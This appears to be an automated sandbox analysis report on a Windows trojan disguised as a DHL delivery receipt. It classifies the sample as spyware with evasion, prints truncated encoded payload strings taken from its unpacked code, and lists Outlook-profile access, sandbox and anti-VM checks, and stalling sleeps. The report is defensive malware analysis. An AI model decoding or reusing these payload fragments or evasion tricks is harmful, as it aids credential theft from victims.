Source: 5.0.Recibo de entrega de DHL.exe.9f0000.0.unpack, Form1.cs	Base64 encoded string: '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
Source: 5.2.Recibo de entrega de DHL.exe.9f0000.1.unpack, Form1.cs	Base64 encoded string: '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

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/2@4/3

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Recibo de entrega de DHL.exe.log

Jump to behavior

Source: Recibo de entrega de DHL.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Recibo de entrega de DHL.exe, 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);

Source: Recibo de entrega de DHL.exe	Virustotal: Detection: 31%
Source: Recibo de entrega de DHL.exe	ReversingLabs: Detection: 12%

Source: unknown	Process created: C:\Users\user\Desktop\Recibo de entrega de DHL.exe 'C:\Users\user\Desktop\Recibo de entrega de DHL.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Recibo de entrega de DHL.exe C:\Users\user\Desktop\Recibo de entrega de DHL.exe
Source: unknown	Process created: C:\Users\user\Desktop\Recibo de entrega de DHL.exe C:\Users\user\Desktop\Recibo de entrega de DHL.exe
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process created: C:\Users\user\Desktop\Recibo de entrega de DHL.exe C:\Users\user\Desktop\Recibo de entrega de DHL.exe
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process created: C:\Users\user\Desktop\Recibo de entrega de DHL.exe C:\Users\user\Desktop\Recibo de entrega de DHL.exe

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Recibo de entrega de DHL.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Recibo de entrega de DHL.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Recibo de entrega de DHL.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation:

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0xA3A09597 [Thu Dec 28 06:24:23 2056 UTC]

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 0_2_00A07F72 push 00000000h; iretd
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 4_2_00317F72 push 00000000h; iretd
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 5_2_009F7F72 push 00000000h; iretd

Source: initial sample

Static PE information: section name: .text entropy: 7.51567311339

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Recibo de entrega de DHL.exe PID: 7008, type: MEMORY
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.2d79518.1.raw.unpack, type: UNPACKEDPE

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Recibo de entrega de DHL.exe, 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Window / User API: threadDelayed 544
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Window / User API: threadDelayed 4143

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 7012	Thread sleep time: -101883s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 7036	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 6604	Thread sleep count: 544 > 30
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -99625s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 6604	Thread sleep count: 4143 > 30
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -99515s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -99406s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -99281s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -99171s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -99062s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -98953s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -98843s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -98734s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -98625s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -98513s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -98406s >= -30000s
